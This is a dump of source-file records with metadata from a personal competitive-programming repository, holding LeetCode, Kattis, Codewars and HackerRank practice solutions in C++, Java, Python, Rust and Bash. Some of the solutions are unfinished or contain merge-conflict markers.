"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 36,
"license_type": "no_license",
"max_line_length": 10,
"num_lines": 4,
"path": "/bash/hackerrank/tail.sh",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#tail1\ntail -n 20\n#tail2\ntail -c 20\n"
},
{
"alpha_fraction": 0.5351351499557495,
"alphanum_fraction": 0.5772972702980042,
"avg_line_length": 27.59375,
"blob_id": "30524b6543769277f9149ebdff8386db49ec9832",
"content_id": "d621af53c3a1526e62369ae7000ec5f2b2a0d2c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 925,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 32,
"path": "/leetcode/MostWater.java",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "<<<<<<< HEAD\nimport java.util.stream.IntStream;\n\npublic class MostWater {\n public int maxArea(int[] height) {\n int res = 0;\n IntStream.range(0, height.length)\n .forEach(i -> {\n IntStream.range(0, height.length).forEach(j -> {res = 1;});\n });\n //.forEach(j -> res = Math.max(res, Math.abs(i - j) * Math.min(height[i], height[j]))));\n return res;\n }\n\n public static void main(String[] args) {\n var myClass = new MostWater();\n myClass.maxArea(IntStream.range(0, 10).toArray());\n }\n=======\nimport java.util.stream.IntStream;\r\n\r\npublic class MostWater {\r\n private int res = 0;\r\n public int maxArea(int[] height) {\r\n }\r\n\r\n public static void main(String[] args) {\r\n var myClass = new MostWater();\r\n System.out.println(myClass.maxArea(new int[] {1,8,6,2,5,4,8,3,7 }));\r\n }\r\n>>>>>>> ab9b0d586098bc648496ece1c2e6bb61f2dcf16d\n}"
},
{
"alpha_fraction": 0.34226804971694946,
"alphanum_fraction": 0.3587628901004791,
"avg_line_length": 22.299999237060547,
"blob_id": "17fcdf58c5f49aa6069f2e0799522132b240b22c",
"content_id": "2e90ccd989f3f886e8e1dc253c8cd3bf01ae67e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 970,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 40,
"path": "/katis/ballotboxes.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nconst int NMAX = 5e5 + 3;\r\nint n, b, a[NMAX];\r\n//----------------------------------------\r\nbool check(int x) {\r\n int cnt = 0;\r\n rep(i, 1, n) \r\n cnt += (a[i] - 1) / x + 1;\r\n return (cnt <= b);\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n int l = 1, r = 5e6, res = 0;\r\n while (l <= r) {\r\n int mid = (l + r) / 2;\r\n if (check(mid)) {\r\n res = mid;\r\n r = mid - 1;\r\n }\r\n else l = mid + 1;\r\n }\r\n cout << res << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n while (cin >> n >> b) {\r\n if (n == -1) break;\r\n rep(i, 1, n) cin >> a[i];\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.358134925365448,
"alphanum_fraction": 0.3730158805847168,
"avg_line_length": 23.0238094329834,
"blob_id": "0448d5110a3f957b1ae7b53c18f58ec52319b39a",
"content_id": "23e616eb9ecfaf711bf0d296d0a8190fe61d0864",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1008,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 42,
"path": "/leetcode/longest_valid_parentheses_2.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nclass Solution {\n public:\n int longestValidParentheses(string s) {\n int left = 0, right = 0, res = 0; \n for (char chr: s) {\n if (chr == '(') \n left += 1;\n else\n right += 1;\n if (left == right) \n res = max(res, left * 2);\n if (left < right) {\n left = 0;\n right = 0;\n }\n }\n\n left = 0; right = 0;\n for (char chr: string(s.rbegin(), s.rend())) {\n if (chr == '(')\n left += 1;\n else\n right += 1;\n if (left == right)\n res = max(res, left * 2);\n if (left > right) {\n left = 0;\n right = 0;\n }\n }\n return res;\n }\n};\n\nint main() {\n Solution a = Solution();\n cout << a.longestValidParentheses(\"(()\");\n cout << a.longestValidParentheses(\"(())\");\n}"
},
{
"alpha_fraction": 0.4853448271751404,
"alphanum_fraction": 0.4991379380226135,
"avg_line_length": 20.10909080505371,
"blob_id": "165e07a63ebcdbf53673d25cef565fff0a80ac90",
"content_id": "259c9d5295f0be4e27cfa088fb2e6d0346587461",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1160,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 55,
"path": "/leetcode/topk_frequent.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nclass Solution {\npublic:\n\tmap<int, int> m;\n\tvector<int> ds;\n\tvector<int> res;\n\tvoid quick_select(int l, int r, int top_select) {\n\t\tif (l >= r) return;\n\t\tif (top_select == 0)\n\t\t\treturn;\n\t\tif (l + 1 == r) {\n\t\t\tres.push_back(ds[l]);\n\t\t\treturn;\n\t\t}\n\t\tint i = l, j = r - 1;\n\t\tint pivot = m[ds[(l + r) / 2]];\n\t\twhile (i <= j) {\n\t\t\twhile (i < r && m[ds[i]] > pivot) i++;\n\t\t\twhile (j >= l && m[ds[j]] < pivot) j--;\n\t\t\tif (i <= j) {\n\t\t\t\tswap(ds[i], ds[j]);\n\t\t\t\ti++; j--;\n\t\t\t}\n\t\t}\n\t\tif (j - l + 1 == top_select) {\n\t\t\tres.insert(res.begin(), ds.begin() + l, ds.begin() + j + 1);\n\t\t} else if (top_select > j - l + 1) {\n\t\t\tres.insert(res.begin(), ds.begin() + l, ds.begin() + j + 1);\n\t\t\tquick_select(j + 1, r, top_select - (j - l + 1));\n\t\t} else {\n\t\t\tquick_select(l, j + 1, top_select);\n\t\t} \n\t}\n\n\tvector<int> topKFrequent(vector<int> nums, int k) {\n\t\tfor (auto num: nums) {\n\t\t\tm[num] += 1;\t\n\t\t\tif (m[num] == 1) \n\t\t\t\tds.push_back(num);\n\t\t}\n\t\tquick_select(0, ds.size(), k);\n\t\treturn res;\n\t}\n};\n\n\nint main() {\n\tSolution a = Solution();\n\tvector<int> v = {1};\n\tauto r = a.topKFrequent(v, 1);\n\tfor (auto x: r) \n\t\tcout << x << \" \";\n}"
},
{
"alpha_fraction": 0.3578363358974457,
"alphanum_fraction": 0.36754506826400757,
"avg_line_length": 19.909090042114258,
"blob_id": "649c1ddf3461e3c15846395509a267f46e75a299",
"content_id": "b4b53150eba350bcd51a34c697a9792e62f76c44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 721,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 33,
"path": "/katis/aboveaverage.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n\r\nint n;\r\nvector<int> a;\r\n\r\n\r\n//----------------------------------------\r\nvoid process() {\r\n int cnt = 0, sum = 0;\r\n for (auto x: a) sum += x;\r\n for (auto x:a) cnt += x * a.size() > sum;\r\n\r\n printf(\"%.3f%%\\n\", float(cnt) / a.size() * 100);\r\n}\r\n//----------------------------------------\r\nint main() {\r\n int test, u;\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n cin >> test;\r\n while (test--) {\r\n cin >> n;\r\n a.clear();\r\n rep(i, 1, n) {\r\n cin >> u;\r\n a.push_back(u);\r\n }\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.35300207138061523,
"alphanum_fraction": 0.36542442440986633,
"avg_line_length": 21.609756469726562,
"blob_id": "963d44582b364aad713dddeb881ac9ce6e9ba6c8",
"content_id": "a56d414f799655c58e36974be867a43ebcde9bee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 966,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 41,
"path": "/katis/sylvester.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n#define ll long long\r\n\r\nll n, x, y, w, h;\r\n//----------------------------------------\r\nint getItem(ll n, ll px, ll py) {\r\n int cnt = 1; ll si = n;\r\n while (si != 1) {\r\n if (px >= si/2 && py >= si/2) cnt *= -1;\r\n px %= si/2; py %= si/2;\r\n si /= 2;\r\n }\r\n\r\n return cnt;\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n rep(i, 0, h - 1) {\r\n rep(j, 0, w - 1)\r\n cout << getItem(n, y + i, x + j) << \" \";\r\n cout << endl;\r\n }\r\n cout << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n int testCase;\r\n cin >> testCase;\r\n while (testCase--) {\r\n cin >> n >> x >> y >> w >> h;\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.5385621190071106,
"alphanum_fraction": 0.543790876865387,
"avg_line_length": 33.727272033691406,
"blob_id": "74bcfbe09bd101e67a216502d48fa76314df3d46",
"content_id": "729e3dd7e4fdbc311fc1c0a7515485e260163f89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 765,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 22,
"path": "/leetcode/38.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <string>\n#include <algorithm>\n\nusing namespace std;\n\nclass Solution {\n public:\n string countAndSay(int n) {\n if (n == 1) return \"1\";\n string previousSay = countAndSay(n - 1);\n auto firstIter = previousSay.begin();\n string res = \"\";\n while (firstIter != previousSay.end()) {\n auto differentCharacterIter = find_if(firstIter, previousSay.end(), [firstIter](char x) { return x != *firstIter; });\n string substr;\n copy(firstIter, differentCharacterIter, back_inserter(substr));\n res = res + to_string(substr.length()) + substr[0];\n firstIter = differentCharacterIter;\n }\n return res;\n }\n};\n\n"
},
{
"alpha_fraction": 0.5101265907287598,
"alphanum_fraction": 0.5151898860931396,
"avg_line_length": 28.296297073364258,
"blob_id": "648808bedcca73e3f9d3ba92d8c22deedc2aa328",
"content_id": "a883bb3bceb6788629b7265f5e735cafdf93f718",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 790,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 27,
"path": "/leetcode/25.java",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "class ListNode {\n int val;\n ListNode next;\n ListNode() {}\n ListNode(int val) { this.val = val; }\n ListNode(int val, ListNode next) { this.val = val; this.next = next; }\n}\n\nclass Solution {\n public ListNode reverseKGroup(ListNode head, int k) {\n ListNode endOfPreviousSegment = null, curr = head, next, startOfThisSegment = null;\n int cnt = 0;\n while (curr != null) {\n cnt += 1;\n next = curr.next; \n curr.next = startOfThisSegment;\n if (cnt == 1)\n startOfThisSegment = curr;\n curr = next;\n if (cnt == k) {\n cnt = 0;\n endOfPreviousSegment.next = startOfThisSegment;\n endOfPreviousSegment = curr;\n }\n }\n }\n}"
},
{
"alpha_fraction": 0.45132744312286377,
"alphanum_fraction": 0.5044247508049011,
"avg_line_length": 20.25,
"blob_id": "a1c15bc5e9ec243c743e8970b0601cccb174e8fd",
"content_id": "8ce92f24c5af527b418979c1897c4a81409cc0e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 339,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 16,
"path": "/codewars/sum_numbers.py",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "def sum_arrangements(num):\n num_str = str(num)\n sum_a = sum([int(x) for x in num_str])\n gt = 1\n mu_10 = 1\n res = 0\n for (i, x) in enumerate(num_str):\n res += sum_a * mu_10\n mu_10 *= 10\n if i != 0:\n gt *= i\n \n return res * gt\n\nprint(sum_arrangements(89))\nprint(sum_arrangements(1185))"
},
{
"alpha_fraction": 0.5084033608436584,
"alphanum_fraction": 0.5630252361297607,
"avg_line_length": 22.799999237060547,
"blob_id": "5657719fc07055aa2a0056bb42961615e2ac4d7c",
"content_id": "d13e9e647f4f97d2586c8b572786f7fa5ce1bccb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 238,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 10,
"path": "/init/test.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nvector<vector<pair<int, int>>> ds(103);\nvector<int> dis (103, -1);\nint main() {\n vector<vector<pair<int, int>>> ds(103);\n for (int i = 0; i < 10; i++)\n cout << dis[i] << endl;\n}\n"
},
{
"alpha_fraction": 0.3412625789642334,
"alphanum_fraction": 0.35590118169784546,
"avg_line_length": 18.27777862548828,
"blob_id": "15b80ae4c2689230010ce6d67a862c20396ee147",
"content_id": "c6a20c6c70764b1698a0f388335b48df033759f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1093,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 54,
"path": "/katis/deduplicatingfiles.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for(auto i = a; i <= b; i++)\r\n\r\nint n;\r\nint h[257];\r\nset<string> b;\r\nmap<string, int> m;\r\n\r\n//----------------------------------------\r\nint hashString(string s) {\r\n int res = 0;\r\n for (auto x: s) {\r\n res ^= (int(x));\r\n }\r\n\r\n return res;\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n string s;\r\n memset(h, 0, sizeof(h));\r\n b.clear();\r\n m.clear();\r\n int sub = 0;\r\n\r\n cin.ignore();\r\n rep(i, 1, n) {\r\n getline(cin, s);\r\n h[hashString(s)]++;\r\n b.insert(s);\r\n if (m.find(s) == m.end())\r\n m[s] = 1;\r\n else {\r\n sub += m[s];\r\n m[s]++;\r\n }\r\n } \r\n\r\n int totalCollide = 0;\r\n rep(i, 0, 255) \r\n totalCollide += (h[i] * (h[i] - 1)) / 2;\r\n\r\n cout << b.size() << \" \" << totalCollide - sub << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n // freopen(\"test.inp\", \"r\", stdin);\r\n while (cin >> n) {\r\n if (n == 0) break;\r\n process();\r\n }\r\n}"
},
{
"alpha_fraction": 0.4347181022167206,
"alphanum_fraction": 0.4658753573894501,
"avg_line_length": 20.74193572998047,
"blob_id": "9db9e2b3d762a8dba5f9ac637ca01089829f2166",
"content_id": "1ce4f6e8d0175062425a54b87c3e225207b1c70d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Rust",
"length_bytes": 674,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 31,
"path": "/leetcode/26.rs",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "use std::convert::TryInto;\n\nstruct Solution;\n\nimpl Solution {\n pub fn remove_duplucates(nums: &mut Vec<i32>) -> i32 {\n if nums.len() == 0 {\n return 0;\n }\n let mut cnt = 1;\n for i in 0..nums.len() - 1 {\n if nums[i] != nums[i + 1] {\n nums[cnt] = nums[i + 1];\n cnt += 1;\n }\n } \n return cnt.try_into().unwrap();\n }\n}\n\nfn main() {\n let mut nums = vec![2, 7, 7, 8];\n let res = Solution::remove_duplucates(&mut nums);\n println!(\"{}\", res);\n}\n\n#[test]\nfn test() {\n let mut nums = vec![2, 7, 7, 8];\n assert_eq!(Solution::remove_duplucates(&mut nums), 3);\n}\n"
},
{
"alpha_fraction": 0.3529614210128784,
"alphanum_fraction": 0.3712121248245239,
"avg_line_length": 23.252174377441406,
"blob_id": "c3248077af2bc27a951026840107d7c0b8b13c65",
"content_id": "64fb4fb571d3b3871fecd3e3ec382ab318e64154",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2904,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 115,
"path": "/katis/cross.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n\r\nchar sudoku[12][12];\r\ntypedef pair<int, int> position;\r\n//----------------------------------------\r\nvoid openf() {\r\n //freopen(\"test.inp\", \"r\", stdin);\r\n rep(i, 0, 8)\r\n rep(j, 0, 8) {\r\n cin >> sudoku[i][j];\r\n\t\t}\r\n}\r\n//----------------------------------------\r\nint getSquare(int i, int j) {\r\n return i / 3 * 3 + j / 3;\r\n}\r\n//----------------------------------------\r\nposition getPosition(int value) {\r\n // initialize rows, cols, squares\r\n set<int> rows, cols, squares;\r\n vector<position> res;\r\n res.clear();\r\n\trows.clear();\r\n\tcols.clear();\r\n\tsquares.clear();\r\n\r\n rep(i, 0, 8) {\r\n rows.insert(i);\r\n cols.insert(i);\r\n squares.insert(i);\r\n }\r\n\r\n rep(i, 0, 8)\r\n rep(j, 0, 8)\r\n if (sudoku[i][j] == '0' + value) {\r\n if (rows.find(i) != rows.end()) \r\n rows.erase(i);\r\n else \r\n return position(-1, -1);\r\n\r\n if (cols.find(j) != cols.end())\r\n cols.erase(j);\r\n else\r\n return position(-1, -1);\r\n if (squares.find(getSquare(i, j)) != squares.end())\r\n squares.erase(getSquare(i, j));\r\n else \r\n return position(-1, -1);\r\n }\r\n\t\r\n\tif (squares.empty()) \r\n\t\treturn position(-3, -3);\r\n \r\n for (auto square:squares) {\r\n\t\tres.clear();\r\n auto srow = square / 3;\r\n auto scol = square % 3;\r\n rep(i, srow * 3, srow * 3 + 2)\r\n rep(j, scol * 3, scol * 3 + 2) {\r\n if (rows.find(i) != rows.end() && cols.find(j) != cols.end() && sudoku[i][j] == '.')\r\n res.push_back(position(i, j));\r\n }\r\n if (res.size() == 0)\r\n return position(-1, -1);\r\n else if (res.size() == 1)\r\n return res[0];\r\n } \r\n\treturn position(-2, -2);\r\n}\r\n//----------------------------------------\r\nvoid write() {\r\n\trep(i, 0, 8) {\r\n\t\trep(j, 0, 8)\r\n\t\t\tcout << sudoku[i][j];\r\n\t\tcout << endl;\r\n\t}\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n\tset<int> g;\r\n\trep(i, 1, 9)\r\n\t\tg.insert(i);\r\n\r\n while (true) {\r\n bool stop = true;\r\n\t\tif (g.empty()) break;\r\n rep(i, 1, 9) {\r\n\t\t\tif (g.find(i) == g.end()) \r\n\t\t\t\tcontinue;\r\n auto p = getPosition(i);\r\n if (p.first == -1) {\r\n cout << \"ERROR\";\r\n return;\r\n } else if (p.first == -3) {\r\n\t\t\t\tstop = false;\r\n\t\t\t\tg.erase(i);\r\n\t\t\t}\r\n\t\t\telse if (p.first != -2) {\r\n sudoku[p.first][p.second] = '0' + i;\r\n stop = false;\r\n }\r\n }\r\n if (stop) break;\r\n }\r\n\r\n\twrite();\r\n}\r\n//----------------------------------------\r\nint main() {\r\n openf();\r\n process();\r\n}\r\n"
},
{
"alpha_fraction": 0.3989361822605133,
"alphanum_fraction": 0.40780141949653625,
"avg_line_length": 23.066667556762695,
"blob_id": "709f9b93c2eb34a156c743bc6af7bc6419790961",
"content_id": "767ae83e38e0e73be992ea90bb4373ff0c1f7162",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1128,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 45,
"path": "/katis/permutationencryption.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define fori(i, a, b) for (int i = a; i <= b; i++)\r\nint n, perArray[23];\r\nstring message; \r\n//----------------------------------------\r\nvoid openf() {\r\n char ch;\r\n fori(i, 0, n - 1)\r\n cin >> perArray[i]; \r\n\tcin.ignore();\r\n getline(cin, message);\r\n}\r\n//----------------------------------------\r\nstring encryptMessage(string subMessage) {\r\n string res = \"\";\r\n fori(i, 0, n - 1)\r\n res += subMessage[perArray[i] - 1];\r\n return res;\r\n}\r\n//----------------------------------------\r\nvoid process() {\r\n while (message.length() % n != 0)\r\n message += ' ';\r\n cout << \"'\";\r\n int i = 0;\r\n while (i < message.length()) {\r\n string subMessage = message.substr(i, n);\r\n cout << encryptMessage(subMessage);\r\n i += n;\r\n }\r\n cout << \"'\" << endl;\r\n}\r\n//----------------------------------------\r\nint main() {\r\n bool firstTime = true;\r\n // freopen(\"test.inp\", \"r\", stdin);\r\n // freopen(\"test.out\", \"w\", stdout);\r\n while (cin >> n) {\r\n if (n == 0) break;\r\n openf();\r\n process();\r\n }\r\n}\r\n"
},
{
"alpha_fraction": 0.3467455506324768,
"alphanum_fraction": 0.36449703574180603,
"avg_line_length": 20.289474487304688,
"blob_id": "3b5ab1b899798e33e2943ce0cf10d5b80353f548",
"content_id": "733453bb3a19a011bfa9e6f1076f478939635288",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 845,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 38,
"path": "/katis/luckynumbers.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\n#define rep(i, a, b) for (auto i = a; i <= b; i++)\r\n#define repr(i, a, b) for (auto i = a; i >= b; i--)\r\n\r\nint n, res = 0;\r\nvector<int> a;\r\n//----------------------------------------\r\nbool validState(int i, int scs) {\r\n int tmp = 0;\r\n for (auto x: a) \r\n tmp = (tmp * 10 + x) % scs;\r\n return (tmp * 10 + i) % scs == 0;\r\n}\r\n//----------------------------------------\r\nvoid gen(int scs) {\r\n if (scs == n + 1) {\r\n res += 1;\r\n return;\r\n }\r\n\r\n rep(i, 0, 9) \r\n if (!(scs == 1 && i == 0) && validState(i, scs)) {\r\n a.push_back(i);\r\n gen(scs + 1);\r\n a.pop_back();\r\n }\r\n}\r\n//----------------------------------------\r\nint main() {\r\n ios_base::sync_with_stdio(false);\r\n cin.tie(NULL);\r\n\r\n cin >> n;\r\n gen(1);\r\n cout << res;\r\n}"
},
{
"alpha_fraction": 0.44463446736335754,
"alphanum_fraction": 0.4805472493171692,
"avg_line_length": 25.845237731933594,
"blob_id": "e0f5154c3440b7419f7fb819622b8e85cdda9891",
"content_id": "52aa4a92aa8cd0b330f55dc45d5a033f61db05f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2339,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 84,
"path": "/leetcode/medianSortedArray.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nclass Solution {\r\n\tpublic:\r\n\t\tdouble findMedianSortedArrays(vector<int>& nums1, vector<int>& nums2) {\r\n\t\t\tint totalSize = nums1.size() + nums2.size();\r\n\t\t\tbool ok = false;\r\n\t\t\t//int v = findMedian(nums2, nums1, (totalSize + 1)/ 2, ok);\r\n\t\t\t//cout << v << endl;\r\n\t\t\t//return 0;\r\n\t\t\tint u = findMedian(nums1, nums2, totalSize / 2 + 1, ok);\r\n\t\t\tcout << \"1u \" << u << endl;\r\n\t\t\tif (!ok) \r\n\t\t\t\tu = findMedian(nums2, nums1, totalSize / 2 + 1, ok);\r\n\t\t\tcout << \"2u \" << u << endl;\r\n\t\t\tok = false;\r\n\t\t\tint v = findMedian(nums1, nums2, (totalSize + 1)/ 2, ok);\r\n\t\t\tcout << \"1v \" << v << endl;\r\n\t\t\tif (!ok) \r\n\t\t\t\tv = findMedian(nums2, nums1, (totalSize + 1)/ 2, ok);\r\n\t\t\tcout << \"2v \" << v << endl;\r\n\t\t\tcout << u << \" \" << v << endl;\r\n\t\t\treturn (u + v * 1.0) / 2;\r\n\t\t}\r\n\tprivate:\r\n\t\tint findMedian(vector<int>& nums1, vector<int>& nums2, int k, bool& ok) {\r\n\t\t\tcout << \"k: \" << k << endl;\r\n\t\t\tok = false;\t\r\n\t\t\tif (nums1.size() == 0) {\r\n\t\t\t\treturn 0;\r\n\t\t\t}\r\n\t\t\tint l = 0, r = nums1.size() - 1;\r\n\t\t\twhile (l <= r) {\r\n\t\t\t\tcout << l << \" \" << r << endl;\r\n\t\t\t\tint mid = (l + r) / 2;\r\n\t\t\t\tcout << \"nums1 mid \" << nums1[mid] << endl;\r\n\t\t\t\tauto pa = equal_range(nums2.begin(), nums2.end(), nums1[mid]);\r\n\t\t\t\tif (pa.first != nums2.end()) {\r\n\t\t\t\t\tcout << \"equal \" << endl;\r\n\t\t\t\t\tint u1 = static_cast<int> (pa.first - nums2.begin());\r\n\t\t\t\t\tint u2;\r\n\t\t\t\t\tif (pa.second != nums2.end())\r\n\t\t\t\t\tu2 = static_cast<int> (pa.second - nums2.begin());\r\n\t\t\t\t\telse u2 = nums2.size();\r\n\t\t\t\t\tif (mid + u1 <= k - 1 && mid + u2 >= k - 1) {\r\n\t\t\t\t\t\tok = true;\r\n\t\t\t\t\t\treturn nums1[mid];\r\n\t\t\t\t\t} \r\n\t\t\t\t\telse if (mid + u1 > k - 1)\r\n\t\t\t\t\t\tr = mid - 1;\r\n\t\t\t\t\telse \r\n\t\t\t\t\t\tl = mid + 1;\r\n\t\t\t\t} else\r\n\t\t\t\t{\r\n\t\t\t\t\tcout << \"not equal \" << endl;\r\n\t\t\t\tint pos;\r\n\t\t\t\tauto ind = upper_bound(nums2.begin(), nums2.end(), nums1[mid]);\r\n\t\t\t\tif (ind == nums2.end()) \r\n\t\t\t\t\tpos = nums2.size();\r\n\t\t\t\telse \r\n\t\t\t\t\tpos = static_cast<int>(ind - nums2.begin());\r\n\t\t\t\tcout << mid << \" \" << pos << endl;\r\n\t\t\t\tif (mid + pos == k - 1) {\r\n\t\t\t\t\tok = true;\r\n\t\t\t\t\treturn nums1[mid];\r\n\t\t\t\t}\r\n\t\t\t\telse if (mid + pos > k - 1)\r\n\t\t\t\t\tr = mid - 1;\r\n\t\t\t\telse \r\n\t\t\t\t\tl = mid + 1;\r\n\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\treturn 0;\r\n\t\t}\r\n};\r\n\r\nint main() {\r\n\tSolution a = Solution();\r\n\tvector<int> nums1 {1, 4};\r\n\tvector<int> nums2 {2, 3};\r\n\tcout << a.findMedianSortedArrays(nums1, nums2);\r\n}\r\n"
},
{
"alpha_fraction": 0.3798449635505676,
"alphanum_fraction": 0.39534884691238403,
"avg_line_length": 24.83333396911621,
"blob_id": "b70379402e8e138d3f80bdc29e1c8fda4a58f989",
"content_id": "1084c4475ac1e10c80737d9d8fa2932493c41f49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 774,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 30,
"path": "/leetcode/next_permutation.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\nusing namespace std;\n\nclass Solution {\n public:\n void nextPermutation(vector<int>& nums) {\n for (int i = nums.size() - 1; i >= 0; i--) { \n int ma = 101, k = -1;\n for (int j = i + 1; j < nums.size(); j++) \n if (nums[j] > nums[i] && nums[j] < ma) {\n ma = nums[j];\n k = j;\n }\n if (k != -1) {\n swap(nums[i], nums[k]);\n sort(nums.begin() + i + 1, nums.end());\n return; \n }\n }\n sort(nums.begin(), nums.end());\n }\n};\n\nint main() {\n Solution a = Solution();\n vector<int> nums = {3, 2, 1};\n a.nextPermutation(nums);\n for (int num:nums) \n cout << num;\n}"
},
{
"alpha_fraction": 0.4882943034172058,
"alphanum_fraction": 0.4949832856655121,
"avg_line_length": 15.70588207244873,
"blob_id": "dc84684085e645c26d99af56c4f0bbb74c3d537b",
"content_id": "5eef2f7be6137114bcf89633eb52e37ba6a3500e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 299,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 17,
"path": "/leetcode/reverseInteger.cpp",
"repo_name": "anhoangphuc/CP",
"src_encoding": "UTF-8",
"text": "#include <bits/stdc++.h>\r\nusing namespace std;\r\n\r\nclass Solution {\r\n public:\r\n int reverse(int x) {\r\n string ax = to_string(x);\r\n reverse(ax.begin(), ax.end());\r\n cout << ax;\r\n return 3;\r\n }\r\n};\r\n\r\nint main() {\r\n Solution a = Solution();\r\n a.reverse(3);\r\n}"
},
{
"alpha_fraction": 0.37910446524620056,
"alphanum_fraction": 0.3940298557281494,
"avg_line_length": 21.126436233520508,
"blob_id": "47064ddee3c5b36dbbb72132d672148844f3b107",
"content_id": "87679385d567f74cb7cb8666d4a6e768cbeabfec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2010,
"license_type": "no_license",
